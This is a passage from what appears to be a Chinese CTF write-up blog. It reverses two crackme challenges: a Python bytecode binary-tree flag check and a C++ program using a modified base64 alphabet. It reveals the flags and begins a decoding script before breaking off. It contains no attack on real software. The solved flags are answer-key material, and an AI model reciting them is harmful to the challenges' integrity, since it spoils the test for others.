class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br></pre></td><td class="code"><pre><span class="line">Disassembly of __init__:</span><br><span class="line"> 47           0 LOAD_CONST               0 (None)</span><br><span class="line">              2 LOAD_FAST                0 (self)</span><br><span class="line">              4 STORE_ATTR               0 (left)</span><br><span class="line"></span><br><span class="line"> 48           6 LOAD_CONST               0 (None)</span><br><span class="line">              8 LOAD_FAST                0 (self)</span><br><span class="line">             10 STORE_ATTR               1 (right)</span><br><span class="line"></span><br><span class="line"> 49          12 LOAD_FAST                1 (data)</span><br><span class="line">             14 LOAD_FAST                0 (self)</span><br><span class="line">             16 STORE_ATTR               2 (data)</span><br><span class="line">             18 LOAD_CONST               0 (None)</span><br><span class="line">             20 RETURN_VALUE</span><br><span class="line"></span><br><span class="line">Disassembly of inorderTraversal:</span><br><span class="line"> 59           0 BUILD_LIST               0</span><br><span class="line">              2 STORE_FAST               2 (res)</span><br><span class="line"></span><br><span class="line"> 60           4 LOAD_FAST                1 (root)</span><br><span class="line">              6 POP_JUMP_IF_FALSE       48</span><br><span class="line"></span><br><span class="line"> 61           8 LOAD_FAST                0 (self)</span><br><span class="line">             10 LOAD_ATTR                0 (inorderTraversal)</span><br><span class="line">             12 LOAD_FAST                1 (root)</span><br><span class="line">             14 LOAD_ATTR                1 (left)</span><br><span class="line">             16 CALL_FUNCTION            1</span><br><span class="line">             18 STORE_FAST               2 (res)</span><br><span class="line"></span><br><span class="line"> 62          20 LOAD_FAST                2 (res)</span><br><span class="line">             22 LOAD_ATTR                2 (append)</span><br><span class="line">             24 LOAD_FAST                1 (root)</span><br><span class="line">             26 LOAD_ATTR                3 (data)</span><br><span class="line">             28 CALL_FUNCTION            1</span><br><span class="line">             30 POP_TOP</span><br><span class="line"></span><br><span class="line"> 63          32 LOAD_FAST                2 (res)</span><br><span class="line">             34 LOAD_FAST                0 (self)</span><br><span class="line">             36 LOAD_ATTR                0 (inorderTraversal)</span><br><span class="line">             38 LOAD_FAST                1 (root)</span><br><span class="line">             40 LOAD_ATTR                4 (right)</span><br><span class="line">             42 CALL_FUNCTION            1</span><br><span class="line">             44 BINARY_ADD</span><br><span class="line">             46 STORE_FAST               2 (res)</span><br><span class="line"></span><br><span class="line"> 64     &gt;&gt;   48 LOAD_FAST                2 (res)</span><br><span class="line">             50 RETURN_VALUE</span><br><span class="line"></span><br><span class="line">Disassembly of insert:</span><br><span class="line"> 51           0 LOAD_FAST                0 (self)</span><br><span class="line">              2 LOAD_ATTR                0 (data)</span><br><span class="line">              4 POP_JUMP_IF_FALSE       62</span><br><span class="line"></span><br><span class="line"> 52           6 LOAD_FAST                0 (self)</span><br><span class="line">              8 LOAD_ATTR                1 (left)</span><br><span class="line">             10 LOAD_CONST               0 (None)</span><br><span class="line">             12 COMPARE_OP               8 (is)</span><br><span class="line">             14 POP_JUMP_IF_FALSE       28</span><br><span class="line"></span><br><span class="line"> 53          16 LOAD_GLOBAL              2 (Node)</span><br><span class="line">             18 LOAD_FAST                1 (data)</span><br><span class="line">             20 CALL_FUNCTION            1</span><br><span class="line">             22 LOAD_FAST                0 (self)</span><br><span class="line">             24 STORE_ATTR               1 (left)</span><br><span class="line">             26 JUMP_FORWARD            34 (to 62)</span><br><span class="line"></span><br><span class="line"> 54     &gt;&gt;   28 LOAD_FAST                0 (self)</span><br><span class="line">             30 LOAD_ATTR                3 (right)</span><br><span class="line">             32 LOAD_CONST               0 (None)</span><br><span class="line">             34 COMPARE_OP               8 (is)</span><br><span class="line">             36 POP_JUMP_IF_FALSE       50</span><br><span class="line"></span><br><span class="line"> 55          38 LOAD_GLOBAL              2 (Node)</span><br><span class="line">             40 LOAD_FAST                1 (data)</span><br><span class="line">             42 CALL_FUNCTION            1</span><br><span class="line">             44 LOAD_FAST                0 (self)</span><br><span class="line">             46 STORE_ATTR               3 (right)</span><br><span class="line">             48 JUMP_FORWARD            12 (to 62)</span><br><span class="line"></span><br><span class="line"> 57     &gt;&gt;   50 LOAD_FAST                0 (self)</span><br><span class="line">             52 LOAD_ATTR                1 (left)</span><br><span class="line">             54 LOAD_ATTR                4 (insert)</span><br><span class="line">             56 LOAD_FAST                1 (data)</span><br><span class="line">             58 CALL_FUNCTION            1</span><br><span class="line">             60 POP_TOP</span><br><span class="line">        &gt;&gt;   62 LOAD_CONST               0 (None)</span><br><span class="line">             64 RETURN_VALUE</span><br><span class="line"></span><br><span class="line">None</span><br><span class="line">  2           0 LOAD_BUILD_CLASS</span><br><span class="line">              2 LOAD_CLOSURE             0 (Node)</span><br><span class="line">              4 BUILD_TUPLE              1</span><br><span class="line">              6 LOAD_CONST               1 (&lt;code object Node at 0x0382DB20, line 2&gt;)</span><br><span class="line">              8 LOAD_CONST               2 (&#39;Node&#39;)</span><br><span class="line">             10 MAKE_FUNCTION            8</span><br><span class="line">             12 LOAD_CONST               2 (&#39;Node&#39;)</span><br><span class="line">             14 CALL_FUNCTION            2</span><br><span class="line">             16 STORE_DEREF              0 (Node)</span><br><span class="line"></span><br><span class="line"> 28          18 LOAD_GLOBAL              0 (input)</span><br><span class="line">             20 LOAD_CONST               3 (&#39;PLZ input flag:&#39;)</span><br><span class="line">             22 CALL_FUNCTION            1</span><br><span class="line">             24 STORE_FAST               0 (str1)</span><br><span class="line"></span><br><span class="line"> 30          26 LOAD_CONST               4 (&lt;code object &lt;listcomp&gt; at 0x0382DB78,  line 30&gt;)</span><br><span class="line">             28 LOAD_CONST               5 (&#39;main1.&lt;locals&gt;.&lt;listcomp&gt;&#39;)</span><br><span class="line">             30 MAKE_FUNCTION            0</span><br><span class="line">             32 LOAD_FAST                0 (str1)</span><br><span class="line">             34 GET_ITER</span><br><span class="line">             36 CALL_FUNCTION            1</span><br><span class="line">             38 STORE_FAST               1 (flag)</span><br><span class="line"></span><br><span class="line"> 31          40 LOAD_DEREF               0 (Node)</span><br><span class="line">             42 LOAD_FAST                1 (flag)</span><br><span class="line">             44 LOAD_CONST               6 (0)</span><br><span class="line">             46 BINARY_SUBSCR</span><br><span class="line">             48 CALL_FUNCTION            1</span><br><span class="line">             50 STORE_FAST               2 (root)</span><br><span class="line"></span><br><span class="line"> 32          52 SETUP_LOOP              36 (to 90)</span><br><span class="line">             54 LOAD_GLOBAL              1 (range)</span><br><span class="line">             56 LOAD_CONST               7 (1)</span><br><span class="line">             58 LOAD_GLOBAL              2 (len)</span><br><span class="line">             60 LOAD_FAST                1 (flag)</span><br><span class="line">             62 CALL_FUNCTION            1</span><br><span class="line">             64 CALL_FUNCTION            2</span><br><span class="line">             66 GET_ITER</span><br><span class="line">        &gt;&gt;   68 FOR_ITER                18 (to 88)</span><br><span class="line">             70 STORE_FAST               3 (i)</span><br><span class="line"></span><br><span class="line"> 33          72 LOAD_FAST                2 (root)</span><br><span class="line">             74 LOAD_ATTR                3 (insert)</span><br><span class="line">             76 LOAD_FAST                1 (flag)</span><br><span class="line">             78 LOAD_FAST                3 (i)</span><br><span class="line">             80 BINARY_SUBSCR</span><br><span class="line">             82 CALL_FUNCTION            1</span><br><span class="line">             84 POP_TOP</span><br><span class="line">             86 JUMP_ABSOLUTE           68</span><br><span class="line">        &gt;&gt;   88 POP_BLOCK</span><br><span class="line"></span><br><span class="line"> 34     &gt;&gt;   90 LOAD_FAST                2 (root)</span><br><span class="line">             92 LOAD_ATTR                4 (inorderTraversal)</span><br><span class="line">             94 LOAD_FAST                2 (root)</span><br><span class="line">             96 CALL_FUNCTION            1</span><br><span class="line">             98 STORE_FAST               4 (F)</span><br><span class="line"></span><br><span class="line"> 35         100 LOAD_CONST               8 (&#39;7b&#125;41ada16fdd2d262c70b8533f00ea&#123;7t1tfuccm&#39;)</span><br><span class="line">            102 STORE_FAST               1 (flag)</span><br><span class="line"></span><br><span class="line"> 36         104 LOAD_CONST               7 (1)</span><br><span class="line">            106 STORE_FAST               5 (YES)</span><br><span class="line"></span><br><span class="line"> 37         108 SETUP_LOOP              50 (to 160)</span><br><span class="line">            110 LOAD_GLOBAL              5 (enumerate)</span><br><span class="line">            112 LOAD_FAST                4 (F)</span><br><span class="line">            114 CALL_FUNCTION            1</span><br><span class="line">            116 GET_ITER</span><br><span class="line">        &gt;&gt;  118 FOR_ITER                38 (to 158)</span><br><span class="line">            120 UNPACK_SEQUENCE          2</span><br><span class="line">            122 STORE_FAST               3 (i)</span><br><span class="line">            124 STORE_FAST               6 (element)</span><br><span class="line"></span><br><span class="line"> 38         126 LOAD_GLOBAL              6 (ord)</span><br><span class="line">            128 LOAD_FAST                1 (flag)</span><br><span class="line">            130 LOAD_FAST                3 (i)</span><br><span class="line">            132 BINARY_SUBSCR</span><br><span class="line">            134 CALL_FUNCTION            1</span><br><span class="line">            136 LOAD_FAST                6 (element)</span><br><span class="line">            138 COMPARE_OP               3 (!&#x3D;)</span><br><span class="line">            140 POP_JUMP_IF_FALSE      118</span><br><span class="line"></span><br><span class="line"> 39         142 LOAD_CONST               6 (0)</span><br><span class="line">            144 STORE_FAST               5 (YES)</span><br><span class="line"></span><br><span class="line"> 40         146 LOAD_GLOBAL              7 (print)</span><br><span class="line">            148 LOAD_CONST               9 (&#39;wrong&#39;)</span><br><span class="line">            150 CALL_FUNCTION            1</span><br><span class="line">            152 POP_TOP</span><br><span class="line"></span><br><span class="line"> 41         154 BREAK_LOOP</span><br><span class="line">            156 JUMP_ABSOLUTE          118</span><br><span class="line">        &gt;&gt;  158 POP_BLOCK</span><br><span class="line"></span><br><span class="line"> 42     &gt;&gt;  160 LOAD_FAST                5 (YES)</span><br><span class="line">            162 POP_JUMP_IF_FALSE      172</span><br><span class="line"></span><br><span class="line"> 43         164 LOAD_GLOBAL              7 (print)</span><br><span class="line">            166 LOAD_CONST              10 (&#39;wow~you are right!&#39;)</span><br><span class="line">            168 CALL_FUNCTION            1</span><br><span class="line">            170 POP_TOP</span><br><span class="line">        &gt;&gt;  172 LOAD_CONST               0 (None)</span><br><span class="line">            174 RETURN_VALUE</span><br><span class="line">None</span><br></pre></td></tr></table></figure>

<p>依次读，大概是读入一个flag，然后对其建二叉树，然后中序遍历得到：7b}41ada16fdd2d262c70b8533f00ea{7t1tfuccm</p>
<p>因此我们对其进行还原即可。最左侧7必然最左子树的最后一颗的左子叶，按左中右，7的parent必然为b，b的右子叶必然为}，将：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">	b</span><br><span class="line">  &#x2F;   \</span><br><span class="line">7		&#125;</span><br></pre></td></tr></table></figure>

<p>看作左子树，遍历左子树后便是自己，因此b的parent必然为4，4的右子叶为1，依次写出，建树。</p>
<p>建树后层次遍历，得到flag：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cumtctf&#123;1e70a305fb378202c26dd6dafa14db17&#125;</span><br></pre></td></tr></table></figure>



<h3 id="easy-cpp"><a href="#easy-cpp" class="headerlink" title="easy_cpp"></a>easy_cpp</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>反编译查看到main的CPP代码：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">const</span> <span class="keyword">char</span> **argv, <span class="keyword">const</span> <span class="keyword">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v3; <span class="comment">// rax</span></span><br><span class="line">  __int64 v4; <span class="comment">// rax</span></span><br><span class="line">  __int64 v5; <span class="comment">// rdx</span></span><br><span class="line">  __gnu_cxx::__normal_iterator&lt;<span class="keyword">char</span>*,<span class="built_in">std</span>::basic_string&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt; &gt; &gt; __rhs; <span class="comment">// [rsp+20h] [rbp-60h]</span></span><br><span class="line">  __gnu_cxx::__normal_iterator&lt;<span class="keyword">char</span>*,<span class="built_in">std</span>::basic_string&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt; &gt; &gt; __lhs; <span class="comment">// [rsp+30h] [rbp-50h]</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span> p_in; <span class="comment">// [rsp+40h] [rbp-40h]</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span> v10; <span class="comment">// [rsp+50h] [rbp-30h]</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span> v11; <span class="comment">// [rsp+60h] [rbp-20h]</span></span><br><span class="line">  <span class="keyword">int</span> deci; <span class="comment">// [rsp+70h] [rbp-10h]</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span> v13; <span class="comment">// [rsp+80h] [rbp+0h]</span></span><br><span class="line">  __gnu_cxx::__normal_iterator&lt;<span class="keyword">char</span>*,<span class="built_in">std</span>::basic_string&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt; &gt; &gt;::reference v14; <span class="comment">// [rsp+90h] [rbp+10h]</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span> *v15; <span class="comment">// [rsp+98h] [rbp+18h]</span></span><br><span class="line"></span><br><span class="line">  _main();</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(&amp;v11);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(&amp;v10);</span><br><span class="line">  v3 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(refptr__ZSt4cout, <span class="string">&quot;please input your flag:&quot;</span>);</span><br><span class="line">  <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v3, refptr__ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_);</span><br><span class="line">  <span class="built_in">std</span>::<span class="keyword">operator</span>&gt;&gt;&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;&gt;(refptr__ZSt3cin, &amp;v11);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">std</span>::<span class="built_in">string</span>::length(&amp;v11) != <span class="number">27</span> )</span><br><span class="line">    v4 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(refptr__ZSt4cout, <span class="string">&quot;your length is wrong&quot;</span>);</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">    v4 = <span class="built_in">std</span>::<span class="keyword">operator</span>&lt;&lt;&lt;<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;&gt;(refptr__ZSt4cout, <span class="string">&quot;flag&#x27;s length is right,then try to encode it&quot;</span>);</span><br><span class="line">  <span class="built_in">std</span>::ostream::<span class="keyword">operator</span>&lt;&lt;(v4, refptr__ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_);</span><br><span class="line">  v15 = &amp;v11;</span><br><span class="line">  __lhs._M_current = (<span class="keyword">char</span> *)<span class="built_in">std</span>::<span class="built_in">string</span>::begin(&amp;v11);</span><br><span class="line">  __rhs._M_current = (<span class="keyword">char</span> *)<span class="built_in">std</span>::<span class="built_in">string</span>::end(v15);</span><br><span class="line">  <span class="keyword">while</span> ( __gnu_cxx::<span class="keyword">operator</span>!=&lt;<span class="keyword">char</span> *,<span class="built_in">std</span>::<span class="built_in">string</span>&gt;(&amp;__lhs, &amp;__rhs) )</span><br><span class="line">  &#123;</span><br><span class="line">    v14 = __gnu_cxx::__normal_iterator&lt;<span class="keyword">char</span> *,<span class="built_in">std</span>::<span class="built_in">string</span>&gt;::<span class="keyword">operator</span>*(&amp;__lhs);</span><br><span class="line">    v5 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)*v14;</span><br><span class="line">    deciToBin((<span class="keyword">unsigned</span> __int64)&amp;deci);</span><br><span class="line">    <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>+=(&amp;v10, &amp;deci);</span><br><span class="line">    <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>((<span class="built_in">std</span>::<span class="built_in">string</span> *)&amp;deci);</span><br><span class="line">    __gnu_cxx::__normal_iterator&lt;<span class="keyword">char</span> *,<span class="built_in">std</span>::<span class="built_in">string</span>&gt;::<span class="keyword">operator</span>++(&amp;__lhs);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(&amp;v13, &amp;v10);</span><br><span class="line">  base64_encryption(&amp;p_in);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>(&amp;v13);</span><br><span class="line">  <span class="keyword">if</span> ( <span class="built_in">std</span>::<span class="keyword">operator</span>==&lt;<span class="keyword">char</span>,<span class="built_in">std</span>::char_traits&lt;<span class="keyword">char</span>&gt;,<span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;&gt;(&amp;p_in, <span class="string">&quot;ZmxhZ3tiGNXlXjHfaDTzN2FfK3LycRTpc2L9&quot;</span>) )</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;u got it!&quot;</span>);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>(&amp;p_in);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>(&amp;v10);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::~<span class="built_in">string</span>(&amp;v11);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>分析发现，会对输入的flag，转换为二进制，具体函数为deciToBin，查看反编译代码：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// local variable allocation has failed, the output may be wrong!</span></span><br><span class="line"><span class="function"><span class="built_in">std</span>::<span class="built_in">string</span> __cdecl <span class="title">deciToBin</span><span class="params">(<span class="keyword">int</span> deci)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// some code here</span></span><br><span class="line">  <span class="keyword">while</span> ( decia )</span><br><span class="line">  &#123;</span><br><span class="line">    Value = decia % <span class="number">2</span>;</span><br><span class="line">    v2 = (_BYTE *)<span class="built_in">std</span>::<span class="built_in">string</span>::at(p_hexStr, i);</span><br><span class="line">    *v2 = Value + <span class="number">48</span>;</span><br><span class="line">    ++i;</span><br><span class="line">    decia /= <span class="number">2</span>;</span><br><span class="line">  &#125;</span><br><span class="line">    <span class="comment">// some code here</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>查看确为将字符串转为二进制的函数。</p>
<p>再到下一步，发现对v13进行了<strong>base64_encryption</strong>，打开函数查看（此处仅列出关键代码）：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(&amp;value, <span class="string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;</span>, &amp;v15);</span><br><span class="line">  <span class="built_in">std</span>::allocator&lt;<span class="keyword">char</span>&gt;::~allocator(&amp;v15);</span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span>::<span class="built_in">string</span>(&amp;p_value, &amp;value);</span><br><span class="line">  change(&amp;p_value);</span><br></pre></td></tr></table></figure>

<p>再对change函数进行分析：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> __cdecl <span class="title">change</span><span class="params">(<span class="built_in">std</span>::<span class="built_in">string</span> *p_value)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> __int8 v1; <span class="comment">// ST2B_1</span></span><br><span class="line">  _BYTE *v2; <span class="comment">// rbx</span></span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int8 *v4; <span class="comment">// rdx</span></span><br><span class="line">  <span class="keyword">int</span> v5; <span class="comment">// eax</span></span><br><span class="line">  <span class="keyword">int</span> result; <span class="comment">// [rsp+2Ch] [rbp-54h]</span></span><br><span class="line">  <span class="built_in">std</span>::<span class="built_in">string</span> *p_valuea; <span class="comment">// [rsp+50h] [rbp-30h]</span></span><br><span class="line"></span><br><span class="line">  p_valuea = p_value;</span><br><span class="line">  result = <span class="number">6</span>;</span><br><span class="line">  <span class="keyword">do</span></span><br><span class="line">  &#123;</span><br><span class="line">    v1 = *(_BYTE *)<span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>[](&amp;value2, result);</span><br><span class="line">    v2 = (_BYTE *)<span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>[](&amp;value2, result);</span><br><span class="line">    *v2 = *(_BYTE *)<span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>[](p_valuea, result);</span><br><span class="line">    v3 = result++;</span><br><span class="line">    v4 = (<span class="keyword">unsigned</span> __int8 *)<span class="built_in">std</span>::<span class="built_in">string</span>::<span class="keyword">operator</span>[](p_valuea, v3);</span><br><span class="line">    v5 = v1;</span><br><span class="line">    *v4 = v1;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">while</span> ( result &lt;= <span class="number">14</span> );</span><br><span class="line">  <span class="keyword">return</span> v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>动态调试得value2的值为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">KLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+&#x2F;</span><br></pre></td></tr></table></figure>

<p>change函数会覆盖原先v13的部分值，覆盖后为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">覆盖后：ABCDEFQRSTUVWXYPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+&#x2F;</span><br><span class="line">覆盖前：ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+&#x2F;</span><br></pre></td></tr></table></figure>

<p>因此，在进行Base64编码时，加密规则不变，但是部分字符的意义发生了变化。</p>
<p>我们按此变化进行解码，具体脚本为：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">BASE64</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// private property</span></span><br><span class="line">    _keyStr = <span class="string">&#x27;ABCDEFQRSTUVWXYPGHIJKLMNOZabcdefghijklmnopqrstuvwxyz0123456789+/&#x27;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// public method for encoding</span></span><br><span class="line">    <span class="built_in">this</span>.encode = <span class="function"><span class="keyword">function</span> (<span class="params">input</span>) </span>&#123;</span><br><span class="line">        <span class="keyword">var</span> output = <span class="string">&quot;&quot;</span>;</span><br><span class="line">        <span class="keyword">var</span> chr1, chr2, chr3, enc1, enc2, enc3, enc4;</span><br><span class="line">        <span class="keyword">var</span> i = <span class="number">0</span>;</span><br><span class="line">        input = _utf8_encode(input);</span><br><span class="line">        <span class="keyword">while</span> (i &lt; input.length) &#123;</span><br><span class="line">            chr1 = input.charCodeAt(i++);</span><br><span class="line">            chr2 = input.charCodeAt(i++);</span><br><span 